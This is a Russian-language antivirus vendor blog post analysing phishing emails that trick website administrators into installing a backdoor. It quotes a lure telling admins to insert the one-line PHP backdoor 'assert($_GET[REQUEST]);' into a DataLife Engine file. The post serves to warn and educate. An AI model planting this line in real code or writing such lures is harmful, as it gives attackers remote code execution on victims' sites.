Фишинг на админов
21 июня 2017
Фишеры очень любят атаковать офисных менеджеров: замученные постоянными письмами, те не особо вчитываются в очередные электронные сообщения. Но это не означает, что другие категории сотрудников фишеров не интересуют. Вот, скажем, письмо для админов:
У нас действительно есть интернет-сервис Dr.Web AV-Desk, поэтому письмо о проблемах с доменом с похожим названием – дело вполне вероятное.
Но приглядимся внимательнее. Письмо прислано на адрес отдела маркетинга. Какое отношение маркетинг имеет к владению сайтом? Далее: вместо того, чтобы затребовать документы, подтверждающие право управления доменом, нас просят создать некий файл. Даже не рассматривая содержимое файла: а вдруг мы на самом деле взломали и увели сайт? Тогда мы с легкостью создадим требуемый файл.
Как обычно, расчет на спешку и панику – дается три дня и ни минуты больше. Письмо, кстати, пришло 2 июня, так что, по идее, нужно было в течение дня все сделать.
Теперь проверяем телефоны при помощи обычного поиска: становится очевидно, что они не принадлежат ни одному из регистраторов сайтов.
Надо отметить, что эта рассылка ходит по Интернету уже не первый день. Фишка в том, что адрес отправителя – корректный. А рассчитывают злоумышленники на то, что пользователь, создав сайт, добавит на свой сайт бэкдор. При обращении к файлу на сайте, содержащему assert, будет выполнен код, переданный в параметрах.
Проверил, письмо пришло от регистратора. Пошел исполнять требование начальства. Минут десять у меня ушло на создание файла и размещение его на сайте. Спешу ответить на письмо регистратора, а то, вдруг файл не найдут, тогда кранты моему домену. Жму на кнопку почтового клиента «Ответить», в письме докладываю об окончании работ по размещению файла у себя на сайте. Отправляю письмо.
Думаете, что тут-то я и понял, что письмо пришло от злодея. Я же написал, что письмо проверял, оно пришло от регистратора, поэтому все проходит штатно, получаю ответ на свое письмо.
Мы не стали отвечать на данное письмо. К сожалению, так поступают не все.
Много действий от пользователя не нужно: создайте директорию, файл, напишите в этом файле одну строку.
Развод заключается в том, что пользователю предлагают создать файл с на первый взгляд безобидным php кодом. Однако, если посмотреть описание функции assert, то сразу станет ясно, что злоумышленники просто выполнят нужный им код.
https://habrahabr.ru/post/265513
https://habrahabr.ru/post/265515
Пошел удалять файл со своего сайта.
А дальше получил ответ на своё письмо, которое написал в ответ на письмо с требованием о размещении файла на своем сайте.
Цитата:
Здравствуйте!
Полученное Вами письмо является мошенническим и отношения к R01 не имеет.
Не рекомендуем внедрять указанный код, поскольку он даст возможность злоумышленникам провести любые манипуляции с содержимым Вашего сайта. Если код все же был размещен, рекомендуем проверить сайт на наличие вредоносного кода и/или восстановить состояние сайта из резервной копии.
С уважением,
...
Есть и другие фишинговые приемы, ориентированные на админов.
Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.
По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.
Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: /engine/engine.php и в самое начало файла после строчки:
<?php>
добавьте:
assert($_GET[REQUEST]);
Антивирусная правДА! рекомендует
Читая входящие письма, не отключайте голову. Подавляющее большинство фишинговых сообщений отсеивается чистой логикой и по формальными признакам: по отсутствию известного отправителя, личного обращения и наличия обратной связи в подписи. В противном случае вы можете отправить деньги злоумышленникам или (как в данном случае) открыть для них дверь собственными руками.
Ну и, конечно, не забывайте, что использование антиспама убережет не только от почтового мусора и фишинга, но и от троянцев-шифровальщиков.
Нам важно ваше мнение
Чтобы оставить комментарий, нужно зайти через свой аккаунт на сайте «Доктор Веб». Если аккаунта еще нет, его можно создать.
Комментарии пользователей
Вячеслав
10:59:32 2020-11-09
Sergey
05:22:49 2020-03-20
Денисенко Павел Андреевич
19:54:37 2018-07-30
Неуёмный Обыватель
00:29:20 2018-07-03
alex-diesel
18:07:38 2018-05-26
Toma
16:49:42 2017-11-24
AntonIT
12:44:59 2017-06-25
SkyNet
18:41:23 2017-06-22
Tav01rus
07:57:03 2017-06-22
vla_va
22:30:09 2017-06-21
Andromeda
22:21:17 2017-06-21
В...а
22:12:09 2017-06-21
НинаК
21:47:50 2017-06-21
Dvakota
21:43:28 2017-06-21
ek
21:16:07 2017-06-21
kva-kva
20:47:32 2017-06-21
mk.insta
20:32:57 2017-06-21
Mehatronik
20:10:39 2017-06-21
Шалтай Александр Болтай
18:50:10 2017-06-21
Шалтай Александр Болтай
18:38:35 2017-06-21
forrus
18:05:02 2017-06-21
Любитель пляжного футбола
17:11:13 2017-06-21
razgen
17:03:29 2017-06-21
https://www.gazeta.ru/tech/news/2017/06/21/n_10206281.shtml
razgen
16:59:31 2017-06-21
Dmur
15:58:15 2017-06-21
Masha
15:07:02 2017-06-21
Sasha50
15:01:17 2017-06-21
djabax
15:00:26 2017-06-21
B0RIS
14:15:50 2017-06-21
Родриго
14:06:26 2017-06-21
DrKV
14:06:02 2017-06-21
Любитель пляжного футбола
14:01:00 2017-06-21
Вячeслaв
13:27:02 2017-06-21
gattcka
13:10:07 2017-06-21
Раш КХ
12:59:35 2017-06-21
Татьяна
12:21:43 2017-06-21
Alexander
12:09:10 2017-06-21
Эта статья уже одиннадцатая в рубрике "На удочке". Нужная информация. Всем, а особенно админам, очень важно периодически возвращаться к азам.
duduka
11:24:54 2017-06-21
maestro431
11:16:48 2017-06-21
coolira
11:11:37 2017-06-21
Верните Неуёмного
10:45:39 2017-06-21
krantroru
10:39:38 2017-06-21
Natalya_2017
10:36:36 2017-06-21
udginvr
10:21:37 2017-06-21
Если требуется точно определить, от кого пришло письмо, нужно посмотреть его исходный текст - там в служебной информации будет описан весь путь, который проделало письмо, прежде чем попасть в ваш почтовый ящик (конечно, здесь тоже могут быть свои особенности, но в целом это значительно более надёжный способ). Именно поэтому в случае возникновения вопросов служба поддержки запрашивает полный текст письма, а не только его внешний вид.
220wolf
10:21:27 2017-06-21
NEOMI1
10:13:52 2017-06-21
dyadya_Sasha
10:13:17 2017-06-21
udginvr
10:10:26 2017-06-21
razgen
10:00:09 2017-06-21
SGES
09:54:02 2017-06-21